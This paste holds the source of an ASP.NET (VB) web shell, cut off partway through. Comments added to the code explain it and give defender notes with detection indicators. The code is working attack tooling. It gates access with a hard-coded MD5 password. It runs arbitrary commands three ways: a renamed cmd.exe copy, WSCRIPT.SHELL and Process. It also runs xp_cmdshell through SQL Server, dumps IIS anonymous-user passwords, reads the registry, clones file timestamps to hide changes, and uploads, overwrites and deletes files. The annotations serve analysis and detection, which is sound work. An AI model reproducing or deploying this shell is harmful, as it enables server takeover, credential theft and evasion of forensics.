
Untitled

a guest May 27th, 2019 257 Never
  1. <%@ Page ContentType="text/html" validateRequest="false" aspcompat="true"%>
  2. <%@ Import Namespace="System.IO" %>
  3. <%@ import namespace="System.Diagnostics" %>
  4. <%@ import namespace="System.Threading" %>
  5. <%@ import namespace="System.Text" %>
  6. <%@ import namespace="System.Security.Cryptography" %>
  7. <%@ Import Namespace="System.Net.Sockets"%>
  8. <%@ Assembly Name="System.DirectoryServices, Version=2.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" %>
  9. <%@ import Namespace="System.DirectoryServices" %>
  10. <%@ import Namespace="Microsoft.Win32" %>
  11. <script language="VB" runat="server">
  12. Dim PASSWORD as string = "e8ff7d8d7a49a969a2cb8502eded9d79"   '   rooot
      ' Hard-coded access credential: a 32-hex-character digest that Login_click
      ' compares against GetMD5(Textbox.Text). The trailing "rooot" is the author's
      ' own annotation (presumably the plaintext or a label - not verified here);
      ' the same word is used as the session key in Login_click.
      ' Defender note: a fixed digest embedded in an .aspx file is a stable string
      ' to search for when sweeping web roots for copies of this sample.
  13. dim url,TEMP1,TEMP2,TITLE as string
      ' Page-level scratch variables shared by the file-manager routines below
      ' (url is assigned in NewFD and Rename; TEMP1/TEMP2 in xexistdir).
  14. Function GetMD5(ByVal strToHash As String) As String
      ' Returns the MD5 digest of strToHash as a lowercase hex string.
      ' The input is converted to bytes with the ASCII encoding and no salt is
      ' added, so the same input always yields the same digest.
  15.             Dim md5Obj As New System.Security.Cryptography.MD5CryptoServiceProvider()
  16.             Dim bytesToHash() As Byte = System.Text.Encoding.ASCII.GetBytes(strToHash)
  17.             bytesToHash = md5Obj.ComputeHash(bytesToHash)
  18.             Dim strResult As String = ""
  19.             Dim b As Byte
  20.             For Each b In bytesToHash
                  ' "x2" = two lowercase hex digits per byte
  21.                 strResult += b.ToString("x2")
  22.             Next
  23.             Return strResult
  24. End Function
  25. Sub Login_click(sender As Object, E As EventArgs)
      ' Click handler for the login control: hashes Textbox.Text with GetMD5 and
      ' compares the result with the PASSWORD constant.
      ' On a match it sets session("rooot")=1 and session.Timeout=60; otherwise it
      ' writes a fixed error string into the response.
      ' No attempt counter or delay is visible in this handler, and none of the
      ' other handlers visible in this part of the file read session("rooot").
      ' Defender note: the failure text below (including the "buttom" misspelling)
      ' is emitted verbatim and can serve as a response-body signature.
  26.   if GetMD5(Textbox.Text)=PASSWORD then    
  27.         session("rooot")=1
  28.         session.Timeout=60
  29.     else
  30.         response.Write("<font color='red'>Your password is wrong! Maybe you press the ""Caps Lock"" buttom. Try again.</font><br>")
  31.     end if
  32. End Sub
  33. 'Run w32 shell
  34. Declare Function WinExec Lib "kernel32" Alias "WinExec" (ByVal lpCmdLine As String, ByVal nCmdShow As Long) As Long
      ' Native import of kernel32!WinExec; called by ExecuteCommand1 to start a process.
  35. Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, ByVal bFailIfExists As Long)  As Long
      ' Native import of kernel32!CopyFileA; called by ExecuteCommand1 to copy a binary.
      ' Defender note: direct kernel32 imports for process start and file copy inside
      ' an .aspx page are unusual for a web application and are worth flagging in
      ' static scans of web content.
  36.  
  37. Sub RunCmdW32(Src As Object, E As EventArgs)
      ' Event handler for the "w32" command form. Takes a command line from the
      ' posted field txtCommand1 (falling back to "dir c:\" when it is empty), has
      ' ExecuteCommand1 run it with output redirected to a temp file, then has
      ' OutputTempFile1 render and delete that file.
      ' The temp path is %TEMP%\<name returned by FileSystemObject.GetTempName>.
      ' No authentication or input check is visible in this handler.
  38.     dim command
  39.     dim fileObject = Server.CreateObject("Scripting.FileSystemObject")     
  40.     dim tempFile = Environment.GetEnvironmentVariable("TEMP") & "\"& fileObject.GetTempName( )
  41.     If Request.Form("txtCommand1") = "" Then
  42.         command = "dir c:\"
  43.     else
  44.         command = Request.Form("txtCommand1")
  45.     End If 
          ' txtCmdFile.Text is the path of the binary that ExecuteCommand1 copies and runs.
  46.     ExecuteCommand1(command,tempFile,txtCmdFile.Text)
  47.     OutputTempFile1(tempFile,fileObject)
  48.     'txtCommand1.text=""
  49. End Sub
  50. Sub ExecuteCommand1(command As String, tempFile As String,cmdfile As String)
      ' Copies the binary at cmdfile to %Temp%\kiss.exe with CopyFile, then starts
      ' that copy through WinExec with "/c <command> > <tempFile>" and show-window
      ' value 10. The WinExec return value is written into the response.
      ' Most of the declared locals are unused; FailIfExists is passed to CopyFile
      ' without ever being assigned.
      ' Defender note: because the interpreter is run from a renamed copy, process
      ' rules keyed only on the image name "cmd.exe" would not match this path.
      ' Alert on the web server process spawning any child, and on executables
      ' being written to the service account's temp directory; "kiss.exe" is a
      ' file-name indicator specific to this sample.
  51.     Dim winObj, objProcessInfo, item, local_dir, local_copy_of_cmd, Target_copy_of_cmd
  52.     Dim objStartup, objConfig, objProcess, errReturn, intProcessID, temp_name
  53.     Dim FailIfExists
  54.    
          ' Directory of the running page; computed but not used by the active code below.
  55.     local_dir = left(request.servervariables("PATH_TRANSLATED"),inStrRev(request.servervariables("PATH_TRANSLATED"),"\"))
  56.     'local_copy_of_cmd = Local_dir+"cmd.exe"
  57.     'local_copy_of_cmd= "C:\\WINDOWS\\system32\\cmd.exe"
  58.     local_copy_of_cmd=cmdfile
  59.     Target_copy_of_cmd = Environment.GetEnvironmentVariable("Temp")+"\kiss.exe"
  60.     CopyFile(local_copy_of_cmd, Target_copy_of_cmd,FailIfExists)
  61.     errReturn = WinExec(Target_copy_of_cmd + " /c " + command + "  > " + tempFile , 10)
  62.     response.write(errReturn)
          ' NOTE(review): presumably a fixed wait so the child can finish writing
          ' tempFile before OutputTempFile1 reads it - confirm.
  63.     thread.sleep(500)
  64. End Sub
  65. Sub OutputTempFile1(tempFile,oFileSys)
      ' Reads the redirected command output from tempFile, places it HTML-encoded
      ' inside <pre> in the resultcmdw32 control (prefixed with the raw
      ' txtCommand1 text), then force-deletes the temp file.
      ' "On Error Resume Next" suppresses every failure in this routine, so a
      ' missing or locked temp file produces no visible error.
      ' Defender note: the output file is deleted right after use, so on-disk
      ' residue from this path is short-lived.
  66.     On Error Resume Next
  67.     dim oFile = oFileSys.OpenTextFile (tempFile, 1, False, 0)
  68.     resultcmdw32.text=txtCommand1.text & vbcrlf & "<pre>" & (Server.HTMLEncode(oFile.ReadAll)) & "</pre>"
  69.     oFile.Close
  70.     Call oFileSys.DeleteFile(tempFile, True)     
  71. End sub
  72. 'End w32 shell
  73. 'Run WSH shell
  74. Sub RunCmdWSH(Src As Object, E As EventArgs)
      ' Event handler for the "WSH" command form. Same flow as RunCmdW32, but the
      ' command comes from the posted field txtcommand2 and is executed by
      ' ExecuteCommand2; OutputTempFile2 renders the result. The input box is
      ' cleared afterwards.
      ' oScriptNet (WSCRIPT.NETWORK) is created but not used in this handler.
      ' No authentication or input check is visible in this handler.
  75.     dim command
  76.     dim fileObject = Server.CreateObject("Scripting.FileSystemObject")
  77.     dim oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
  78.     dim tempFile = Environment.GetEnvironmentVariable("TEMP") & "\"& fileObject.GetTempName( )
  79.     If Request.Form("txtcommand2") = "" Then
  80.         command = "dir c:\"
  81.     else
  82.         command = Request.Form("txtcommand2")
  83.     End If   
  84.     ExecuteCommand2(command,tempFile)
  85.     OutputTempFile2(tempFile,fileObject)
  86.     txtCommand2.text=""
  87. End Sub
  88. Function ExecuteCommand2(cmd_to_execute, tempFile)
      ' Runs "cmd.exe /c <cmd_to_execute> > <tempFile>" through the WSCRIPT.SHELL
      ' COM object, with window style 0 and wait-on-return True. Nothing is
      ' assigned to the function's return value.
      ' Defender note: this path produces a cmd.exe child of the process hosting
      ' the page; a web server process spawning a command interpreter is a
      ' standard web-shell detection signal.
  89.       Dim oScript
  90.       oScript = Server.CreateObject("WSCRIPT.SHELL")
  91.       Call oScript.Run ("cmd.exe /c " & cmd_to_execute & " > " & tempFile, 0, True)
  92. End function
  93. Sub OutputTempFile2(tempFile,fileObject)
      ' Counterpart of OutputTempFile1 for the WSH path: reads tempFile, shows it
      ' HTML-encoded inside <pre> in resultcmdwsh (prefixed with the raw
      ' txtCommand2 text), then force-deletes the file.
      ' All errors are suppressed by "On Error Resume Next".
  94.     On Error Resume Next
  95.     dim oFile = fileObject.OpenTextFile (tempFile, 1, False, 0)
  96.     resultcmdwsh.text=txtCommand2.text & vbcrlf & "<pre>" & (Server.HTMLEncode(oFile.ReadAll)) & "</pre>"
  97.     oFile.Close
  98.     Call fileObject.DeleteFile(tempFile, True)
  99. End sub
  100. 'End WSH shell
  101.  
  102. 'System infor
  103. Sub output_all_environment_variables(mode)
       ' Writes every environment variable of the hosting process into the response.
       ' mode="HTML" emits "<b> key </b>: value<br>"; mode="text" emits "key: value"
       ' followed by two newlines; any other mode writes nothing.
       ' Values are written without HTML encoding.
       ' Defender note: anything stored in the service account's environment
       ' (paths, connection settings) is disclosed to whoever can reach this page.
  104.     Dim environmentVariables As IDictionary = Environment.GetEnvironmentVariables()
  105.     Dim de As DictionaryEntry
  106.     For Each de In  environmentVariables
  107.     if mode="HTML" then
  108.     response.write("<b> " +de.Key + " </b>: " + de.Value + "<br>")
  109.     else
  110.     if mode="text"
  111.     response.write(de.Key + ": " + de.Value + vbnewline+ vbnewline)
  112.     end if     
  113.     end if
  114.     Next
  115. End sub
  116. Sub output_all_Server_variables(mode)
       ' Writes every entry of request.servervariables into the response.
       ' mode="HTML" emits "<b>name</b> : value<br>"; mode="text" emits
       ' "name : value" followed by two newlines; any other mode writes nothing.
       ' Values are written without HTML encoding.
  117.     dim item
  118.     for each item in request.servervariables
  119.     if mode="HTML" then
  120.     response.write("<b>" + item + "</b> : ")
  121.     response.write(request.servervariables(item))
  122.     response.write("<br>")
  123.     else
  124.         if mode="text"
  125.             response.write(item + " : " + request.servervariables(item) + vbnewline + vbnewline)
  126.         end if     
  127.     end if
  128.     next
  129. End sub
  130. 'End sysinfor
  131. Function Server_variables() As String
       ' Intended to return the non-empty server variables as one
       ' "name : value" string.
  132.     dim item
  133.     dim tmp As String
  134.     tmp=""
  135.     for each item in request.ServerVariables
  136.         if request.servervariables(item) <> ""
  137.         'response.write(item + " : " + request.servervariables(item) + vbnewline + vbnewline)
               ' NOTE(review): "=+" is an assignment of a unary-plus expression, not
               ' "+=", so the accumulation this loop appears to intend does not
               ' happen as written - confirm. VB has no backslash escapes, so
               ' "\n\r" is the four literal characters, not a line break.
  138.         tmp =+ item.ToString + " : " + request.servervariables(item).ToString + "\n\r"
  139.         end if
  140.     next
  141.     return tmp
  142. End function
  143. 'Begin List processes
  144. Function output_wmi_function_data(Wmi_Function,Fields_to_Show)
       ' Runs the WMI query "Select <Fields_to_Show> from <Wmi_Function>" against
       ' the local root\cimv2 namespace (impersonation level "impersonate") and
       ' writes one HTML table row per result: the first listed field in bold, the
       ' remaining fields passed through center_ (defined outside this view).
       ' Fields_to_Show is a comma-separated property list; it is concatenated
       ' into the query text and also used as the header row.
       ' Property values are written without HTML encoding; the table opened here
       ' is not closed inside this function.
       ' Nothing is assigned to the function's return value.
  145.         dim objProcessInfo , winObj, item , Process_properties, Process_user, Process_domain
  146.         dim fields_split, fields_item,i
  147.  
  148.         'on error resume next
  149.  
  150.         table("0","","")
  151.         Create_table_row_with_supplied_colors("black","white","center",Fields_to_Show)
  152.  
  153.         winObj = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
  154.         objProcessInfo = winObj.ExecQuery("Select "+Fields_to_Show+" from " + Wmi_Function)                
  155.        
  156.         fields_split = split(Fields_to_Show,",")
  157.         for each item in objProcessInfo
  158.             tr
  159.                 Surround_by_TD_and_Bold(item.properties_.item(fields_split(0)).value)
  160.                 if Ubound(Fields_split)>0 then
  161.                     for i = 1 to ubound(fields_split)
  162.                         Surround_by_TD(center_(item.properties_.item(fields_split(i)).value))              
  163.                     next
  164.                 end if
  165.             _tr
  166.         next
  167. End function
  168. Function output_wmi_function_data_instances(Wmi_Function,Fields_to_Show,MaxCount)
       ' Variant of output_wmi_function_data that enumerates instances of the WMI
       ' class Wmi_Function with InstancesOf (the ExecQuery form is commented out)
       ' and stops after a row cap derived from MaxCount.
       ' A header table is written and closed first; each instance then opens its
       ' own table, which is not closed inside this function.
       ' Property values are written without HTML encoding.
       ' Nothing is assigned to the function's return value.
  169.         dim objProcessInfo , winObj, item , Process_properties, Process_user, Process_domain
  170.         dim fields_split, fields_item,i,count
  171.         newline
  172.         rw("Showing the first " + cstr(MaxCount) + " Entries")
  173.         newline
  174.         newline
  175.         table("1","","")
  176.         Create_table_row_with_supplied_colors("black","white","center",Fields_to_Show)
  177.         _table
  178.         winObj = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
  179. '       objProcessInfo = winObj.ExecQuery("Select "+Fields_to_Show+" from " + Wmi_Function)                
  180.         objProcessInfo = winObj.InstancesOf(Wmi_Function)                  
  181.        
  182.         fields_split = split(Fields_to_Show,",")
  183.         count = 0
  184.         for each item in objProcessInfo    
  185.             count = Count + 1
  186.             table("1","","")
  187.             tr
  188.                 Surround_by_TD_and_Bold(item.properties_.item(fields_split(0)).value)
  189.                 if Ubound(Fields_split)>0 then
  190.                     for i = 1 to ubound(fields_split)
  191.                         Surround_by_TD(item.properties_.item(fields_split(i)).value)               
  192.                     next
  193.                 end if
  194.             _tr
                   ' The cap is tested after the row is written and uses ">", so up to
                   ' MaxCount + 1 rows are emitted.
  195.             if count > MaxCount then exit for
  196.         next
  197. End function
  198. 'End List processes
  199. 'Begin IIS_list_Anon_Name_Pass
  200. Sub IIS_list_Anon_Name_Pass()
       ' Connects to the WMI namespace root/microsoftIISv2 on 127.0.0.1, enumerates
       ' IIsWebVirtualDirSetting instances and writes, for each one, the
       ' AppFriendlyName, AppPoolId, AnonymousUserName and AnonymousUserPass
       ' properties into the response, stopping after a cap derived from MaxCount.
       ' Values are written without HTML encoding and flushed per item.
       ' Defender note: if this file is found on a server, treat every IIS
       ' anonymous-user credential readable by the page's identity as exposed and
       ' rotate it; restricting the web application identity's access to the IIS
       ' WMI provider removes this source.
  201.         Dim IIsComputerObj, iFlags ,providerObj ,nodeObj ,item, IP
  202.        
               ' The object created on the next line is a WbemScripting.SWbemLocator,
               ' whatever the variable name and inline comment say.
  203.         IIsComputerObj = CreateObject("WbemScripting.SWbemLocator")             ' Create an instance of the IIsComputer object
  204.         providerObj = IIsComputerObj.ConnectServer("127.0.0.1", "root/microsoftIISv2")
  205.         nodeObj  = providerObj.InstancesOf("IIsWebVirtualDirSetting") '  - IISwebServerSetting
  206.        
  207.         Dim MaxCount = 20,Count = 0
  208.         hr
  209.         RW("only showing the first "+cstr(MaxCount) + " items")
  210.         hr
  211.         for each item in nodeObj
  212.             response.write("<b>" + item.AppFriendlyName + " </b> -  ")
  213.             response.write("(" + item.AppPoolId + ") ")
  214.        
  215.             response.write(item.AnonymousUserName + " : ")
  216.             response.write(item.AnonymousUserPass)
  217.            
  218.             response.write("<br>")
  219.            
  220.             response.flush
  221.             Count = Count +1
                   ' Tested after output with ">", so up to MaxCount + 1 items are shown.
  222.             If Count > MaxCount then exit for
  223.         next       
  224.         hr
  225. End sub
  226. 'End IIS_list_Anon_Name_Pass
  227. Private Function CheckIsNumber(ByVal sSrc As String) As Boolean
       ' Returns True when sSrc matches the regular expression below; IISSpy uses
       ' it to pick the numerically named children of the W3SVC node.
       ' NOTE(review): alternation binds more loosely than the anchors, so the
       ' pattern reads as "^0" OR "[0-9]*[1-9][0-9]*$". It therefore also accepts
       ' any string that starts with 0 or ends in a non-zero-containing digit run;
       ' "^(0|[0-9]*[1-9][0-9]*)$" was presumably intended.
  228.     Dim reg As New System.Text.RegularExpressions.Regex("^0|[0-9]*[1-9][0-9]*$")
  229.       If reg.IsMatch(sSrc) Then
  230.             Return True
  231.       Else
  232.             Return False
  233.       End If
  234. End Function
  235.  
  236. Public Function IISSpy() As String
       ' Builds and returns an HTML table describing the sites under
       ' IIS://localhost/W3SVC. For every child whose name passes CheckIsNumber it
       ' reads the "root" IIsWebVirtualDir entry and emits: a running index,
       ' AnonymousUserName, AppPoolId, the first ServerBindings value, and the
       ' site's Path as a link back to this page with ?action=goto&src=<Path>\.
       ' Any exception aborts the listing and returns only the exception message.
       ' Property values are concatenated into the markup without HTML encoding.
       ' Defender note: this enumerates every site and its on-disk root on a shared
       ' host; the page's identity needs read access to the IIS ADSI provider for
       ' it to work.
  237.       Dim iisinfo As String = ""
  238.       Dim iisstart As String = ""
  239.       Dim iisend As String = ""
  240.       Dim iisstr As String = "IIS://localhost/W3SVC"
  241.       Dim i As Integer = 0
  242.       Try
  243.             Dim mydir As New DirectoryEntry(iisstr)
  244.             iisstart = "<TABLE width=100% align=center border=0><TR align=center><TD width=5%><B>Order</B></TD><TD width=20%><B>IIS_USER</B></TD><TD width=20%><B>App_Pool_Id</B></TD><TD width=25%><B>Domain</B></TD><TD width=30%><B>Path</B></TD></TR>"
  245.             For Each child As DirectoryEntry In mydir.Children
  246.                   If CheckIsNumber(child.Name.ToString()) Then
  247.                         Dim dirstr As String = child.Name.ToString()
  248.                         Dim tmpstr As String = ""
  249.                         Dim newdir As New DirectoryEntry(iisstr + "/" + dirstr)
  250.                         Dim newdir1 As DirectoryEntry = newdir.Children.Find("root", "IIsWebVirtualDir")
  251.                         i = i + 1
  252.                         iisinfo += "<TR><TD align=center>" + i.ToString() + "</TD>"
  253.                         iisinfo += "<TD align=center>" + newdir1.Properties("AnonymousUserName").Value.ToString() + "</TD>"
  254.                         iisinfo += "<TD align=center>" + newdir1.Properties("AppPoolId").Value.ToString() + "</TD>"
  255.                         iisinfo += "<TD>" + child.Properties("ServerBindings")(0) + "</TD>"
  256.                         iisinfo += "<TD><a href="+Request.ServerVariables("PATH_INFO")+ "?action=goto&src=" + newdir1.Properties("Path").Value.ToString() + "\>" + newdir1.Properties("Path").Value + "\</a></TD>"
  257.                         iisinfo += "</TR>"
  258.                   End If
  259.             Next
  260.             iisend = "</TABLE>"
  261.       Catch ex As Exception
  262.             Return ex.Message
  263.       End Try
  264.       Return iisstart + iisinfo + iisend
  265. End Function
  266.  
  267. Sub RegistryRead(Src As Object, E As EventArgs)
       ' Event handler that reads one registry value and shows it in lblresultReg.
       ' txtRegKey.Text is split at its first backslash into a hive name and a
       ' subkey path; the hive name is compared with five fixed names and the
       ' matching hive is opened read-only with OpenSubKey. txtRegValue.Text names
       ' the value; "NULL" is the default when the value does not exist.
       ' If the hive name matches none of the five, rk stays Nothing and the
       ' GetValue call throws; that and every other exception is caught and its
       ' message written into the response.
       ' Defender note: registry reads happen under the page's identity; what is
       ' readable is bounded by that account's registry ACLs.
  268.     Try
  269.             Dim regkey As String = txtRegKey.Text
  270.             Dim subkey As String = regkey.Substring(regkey.IndexOf("\") + 1, regkey.Length - regkey.IndexOf("\") - 1)
  271.             Dim rk As RegistryKey = Nothing
  272.             Dim buffer As Object
  273.             Dim regstr As String = ""
  274.             If regkey.Substring(0, regkey.IndexOf("\")) = "HKEY_LOCAL_MACHINE" Then
  275.                   rk = Registry.LocalMachine.OpenSubKey(subkey)
  276.             End If
  277.             If regkey.Substring(0, regkey.IndexOf("\")) = "HKEY_CLASSES_ROOT" Then
  278.                   rk = Registry.ClassesRoot.OpenSubKey(subkey)
  279.             End If
  280.             If regkey.Substring(0, regkey.IndexOf("\")) = "HKEY_CURRENT_USER" Then
  281.                   rk = Registry.CurrentUser.OpenSubKey(subkey)
  282.             End If
  283.             If regkey.Substring(0, regkey.IndexOf("\")) = "HKEY_USERS" Then
  284.                   rk = Registry.Users.OpenSubKey(subkey)
  285.             End If
  286.             If regkey.Substring(0, regkey.IndexOf("\")) = "HKEY_CURRENT_CONFIG" Then
  287.                   rk = Registry.CurrentConfig.OpenSubKey(subkey)
  288.             End If
  289.             buffer = rk.GetValue(txtRegValue.Text, "NULL")
               ' tmpbyte (and regstr above) are declared but never used.
  290.         dim tmpbyte As Byte = 0
  291.                   lblresultReg.Text = "<br>Result : " + buffer.ToString()
  292.       Catch ex As Exception
  293.             Response.write(ex.Message)
  294.       End Try
  295. End Sub
  296.  
  297. ' Begin List Web Site Home Directory Properties
  298.  
  299.  
  300. ' End List Web Site Home Directory Properties
  301. Sub RunCMD(Src As Object, E As EventArgs)
       ' Event handler that starts "cmd.exe /c <Cmd.text>" through
       ' System.Diagnostics.Process with UseShellExecute off and standard output
       ' redirected, reads all output, and places it inside <pre> in the result
       ' control before clearing the input box.
       ' Unlike the W32/WSH paths, the output is not HTML-encoded here and no temp
       ' file is involved.
       ' The bare Catch hides every failure behind a fixed message.
       ' Defender note: this is a third independent route to a cmd.exe child of the
       ' web server process; the fixed "This function has disabled!" text is a
       ' response-body indicator for this sample.
  302.     Try
  303.     Dim kProcess As New Process()
  304.     Dim kProcessStartInfo As New ProcessStartInfo("cmd.exe")
  305.     kProcessStartInfo.UseShellExecute = False
  306.     kProcessStartInfo.RedirectStandardOutput = true
  307.     kProcess.StartInfo = kProcessStartInfo
  308.     kProcessStartInfo.Arguments="/c " & Cmd.text
  309.     kProcess.Start()
  310.     Dim myStreamReader As StreamReader = kProcess.StandardOutput
  311.     Dim myString As String = myStreamReader.Readtoend()
  312.     kProcess.Close()
  313.     result.text=Cmd.text & vbcrlf & "<pre>" & mystring & "</pre>"
  314.     Cmd.text=""
  315.     Catch
  316.     result.text="This function has disabled!"
  317.     End Try
  318. End Sub
  319. Sub CloneTime(Src As Object, E As EventArgs)
       ' Event handler that copies the LastWriteTime, LastAccessTime and
       ' CreationTime of the file named in time2.Text onto the file named in
       ' time1.Text. existdir ends the response first if either path is missing.
       ' Defender note: on a host where this page has run, these three timestamps
       ' cannot be relied on to date a file. Corroborate with sources the FileInfo
       ' API does not set, such as the NTFS change journal, the $FILE_NAME
       ' attribute times, or web server logs.
  320.     existdir(time1.Text)
  321.     existdir(time2.Text)
  322.     Dim thisfile As FileInfo =New FileInfo(time1.Text)
  323.     Dim thatfile As FileInfo =New FileInfo(time2.Text)
  324.     thisfile.LastWriteTime = thatfile.LastWriteTime
  325.     thisfile.LastAccessTime = thatfile.LastAccessTime
  326.     thisfile.CreationTime = thatfile.CreationTime
  327.     response.Write("<font color=""red"">Clone Time Success!</font>")
  328. End Sub
  329. sub Editor(Src As Object, E As EventArgs)
       ' Event handler that writes content.text to the path in filepath.text,
       ' overwriting any existing file (append=false) with the system default
       ' encoding, then emits a script block that shows an alert and navigates to
       ' the parent directory listing.
       ' The path is taken as supplied; only backslashes are doubled for the alert
       ' text, so the path is otherwise unescaped inside the emitted script.
       ' Defender note: this is an arbitrary file create/overwrite within the
       ' page identity's permissions. File-integrity monitoring on web content
       ' directories and a non-writable web root limit its effect.
  330.     dim mywrite as new streamwriter(filepath.text,false,encoding.default)
  331.     mywrite.write(content.text)
  332.     mywrite.close
  333.     response.Write("<script>alert('Edit|Creat " & replace(filepath.text,"\","\\") & " Success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(filepath.text)) &"'</sc" & "ript>")
  334. end sub
  335. Sub UpLoad(Src As Object, E As EventArgs)
       ' Event handler that saves the posted file to <query-string "src"> + <file
       ' name taken from UpFile.value>. If that path already exists it reports
       ' failure and ends the response; otherwise it saves the file and emits a
       ' script block with an alert (client path, size, save path) and a redirect
       ' to the directory listing.
       ' No file type, size or destination restriction is visible.
       ' Defender note: newly created files under web-served directories,
       ' especially script or executable types written by the web server account,
       ' are a primary artifact of this routine.
  336.     dim filename,loadpath as string
  337.     filename=path.getfilename(UpFile.value)
  338.     loadpath=request.QueryString("src") & filename
  339.     if  file.exists(loadpath)=true then
  340.         response.Write("<script>alert('File " & replace(loadpath,"\","\\") & " have existed , upload fail!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(request.QueryString("src")) &"'</sc" & "ript>")
  341.         response.End()
  342.     end if
  343.     UpFile.postedfile.saveas(loadpath)
  344.     response.Write("<script>alert('File " & filename & " upload success!\nFile info:\n\nClient Path:" & replace(UpFile.value,"\","\\") & "\nFile Size:" & UpFile.postedfile.contentlength & " bytes\nSave Path:" & replace(loadpath,"\","\\") & "\n');")
  345.     response.Write("location.href='" & request.ServerVariables("URL") & "?action=goto&src=" & server.UrlEncode(request.QueryString("src")) & "'</sc" & "ript>")
  346. End Sub
  347. Sub NewFD(Src As Object, E As EventArgs)
       ' Event handler that creates either an empty file or a directory named
       ' <form "src"> + NewName.Text, depending on the NewFile checkbox.
       ' For a file it opens and immediately closes a StreamWriter (overwrite mode)
       ' and redirects to ?action=edit for that path; for a directory it calls
       ' CreateDirectory and emits an alert plus a redirect to the listing.
       ' Sets the page-level variable url as a side effect.
  348.     url=request.form("src")
  349.     if NewFile.Checked = True then
  350.         dim mywrite as new streamwriter(url & NewName.Text,false,encoding.default)
  351.         mywrite.close
  352.         response.Redirect(request.ServerVariables("URL") & "?action=edit&src=" & server.UrlEncode(url & NewName.Text))
  353.     else
  354.         directory.createdirectory(url & NewName.Text)
  355.         response.Write("<script>alert('Creat directory " & replace(url & NewName.Text ,"\","\\") & " Success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</sc" & "ript>")
  356.     end if
  357. End Sub
  358. Sub del(a)
       ' Deletes the path a. A trailing backslash marks a directory: its files are
       ' deleted, each subdirectory is handled by a recursive call, and the then
       ' empty directory is removed. Anything else is deleted as a single file.
       ' There is no confirmation, error handling or path restriction here.
       ' Defender note: bulk deletions by the web server account under content or
       ' log directories are the observable effect of this routine.
  359.     if right(a,1)="\" then
  360.         dim xdir as directoryinfo
  361.         dim mydir as new DirectoryInfo(a)
  362.         dim xfile as fileinfo
  363.         for each xfile in mydir.getfiles()
  364.             file.delete(a & xfile.name)
  365.         next
  366.         for each xdir in mydir.getdirectories()
  367.             call del(a & xdir.name & "\")
  368.         next
  369.         directory.delete(a)
  370.     else
  371.         file.delete(a)
  372.     end if
  373. End Sub
  374. Sub copydir(a,b)
       ' Recursively copies the contents of directory a into directory b: files
       ' with File.Copy, subdirectories by creating the target directory and
       ' recursing.
       ' NOTE(review): the file copy joins a and the file name with an explicit
       ' "\" while the subdirectory lines join a and the name directly, so the two
       ' loops assume different trailing-separator conventions for a - confirm
       ' against the callers, which are outside this view.
  375.     dim xdir as directoryinfo
  376.     dim mydir as new DirectoryInfo(a)
  377.     dim xfile as fileinfo
  378.     for each xfile in mydir.getfiles()
  379.         file.copy(a & "\" & xfile.name,b & xfile.name)
  380.     next
  381.     for each xdir in mydir.getdirectories()
  382.         directory.createdirectory(b & path.getfilename(a & xdir.name))
  383.         call copydir(a & xdir.name & "\",b & xdir.name & "\")
  384.     next
  385. End Sub
  386. Sub xexistdir(temp,ow)
       ' Name-collision handling for a paste/move target. Acts only when temp
       ' already exists as a file or directory:
       '   ow = 0    -> redirect to ?action=samename for the page-level url
       '   ow = 1    -> delete the existing target with del
       '   otherwise -> derive an alternative name from session("cutboard"),
       '                prefixed with the current seconds value, and store it in
       '                the page-level TEMP1 (directory) or TEMP2 (file).
       ' NOTE(review): replace(d,"","") has an empty search string as shown here;
       ' characters may have been lost when the code was pasted - confirm.
  387.     if directory.exists(temp)=true or file.exists(temp)=true then
  388.         if ow=0  then
  389.             response.Redirect(request.ServerVariables("URL") & "?action=samename&src=" & server.UrlEncode(url))
  390.         elseif ow=1 then
  391.             del(temp)
  392.         else
  393.             dim d as string = session("cutboard")
  394.             if right(d,1)="\" then
  395.                 TEMP1=url & second(now) & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1))
  396.             else
  397.                 TEMP2=url & second(now) & replace(path.getfilename(d),"","")
  398.             end if
  399.         end if
  400.     end if
  401. End Sub
  402. Sub existdir(temp)
       ' Guard used before file operations: when temp is neither an existing file
       ' nor an existing directory, writes an alert script and a "back" link and
       ' ends the response, so the caller's remaining code does not run.
       ' Only backslashes in temp are doubled before it is placed in the script.
  403.         if  file.exists(temp)=false and directory.exists(temp)=false then
  404.             response.Write("<script>alert('Don\'t exist " & replace(temp,"\","\\")  &" ! Is it a CD-ROM ?');</sc" & "ript>")
  405.             response.Write("<br><br><a href='javascript:history.back(1);'>Click Here Back</a>")
  406.             response.End()
  407.         end if
  408. End Sub
  409. Sub RunSQLCMD(Src As Object, E As EventArgs)
       ' Event handler that opens an ADODB connection through the SQLOLEDB provider
       ' using the host, login and password typed into the form (ip, SqlName,
       ' SqlPass), then sends "exec master.dbo.xp_cmdshell '<Sqlcmd.Text>'" and
       ' shows the first column of every returned row inside <pre> in resultSQL.
       ' Spaces, "<" and ">" in the result are replaced with HTML entities; the
       ' echoed command text is not encoded. Does nothing when SqlName is empty.
       ' Defender note: this reaches operating-system command execution through
       ' the database server rather than the web server, so the child process
       ' appears under SQL Server. Keeping xp_cmdshell disabled, alerting on it
       ' being enabled or invoked, and denying sysadmin-level logins from web
       ' hosts are the relevant controls.
  410.     Dim adoConn,strQuery,recResult,strResult
  411.     if SqlName.Text<>"" then
  412.         adoConn=Server.CreateObject("ADODB.Connection")
  413.         adoConn.Open("Provider=SQLOLEDB.1;Password=" & SqlPass.Text & ";UID=" & SqlName.Text & ";Data Source = " & ip.Text)
  414.         If Sqlcmd.Text<>"" Then
  415.             strQuery = "exec master.dbo.xp_cmdshell '" & Sqlcmd.Text & "'"
  416.             recResult = adoConn.Execute(strQuery)
  417.             If NOT recResult.EOF Then
  418.                 Do While NOT recResult.EOF
  419.                     strResult = strResult & chr(13) & recResult(0).value
  420.                     recResult.MoveNext
  421.                 Loop
  422.             End if
  423.             recResult = Nothing
  424.             strResult = Replace(strResult," ","&nbsp;")
  425.             strResult = Replace(strResult,"<","&lt;")
  426.             strResult = Replace(strResult,">","&gt;")
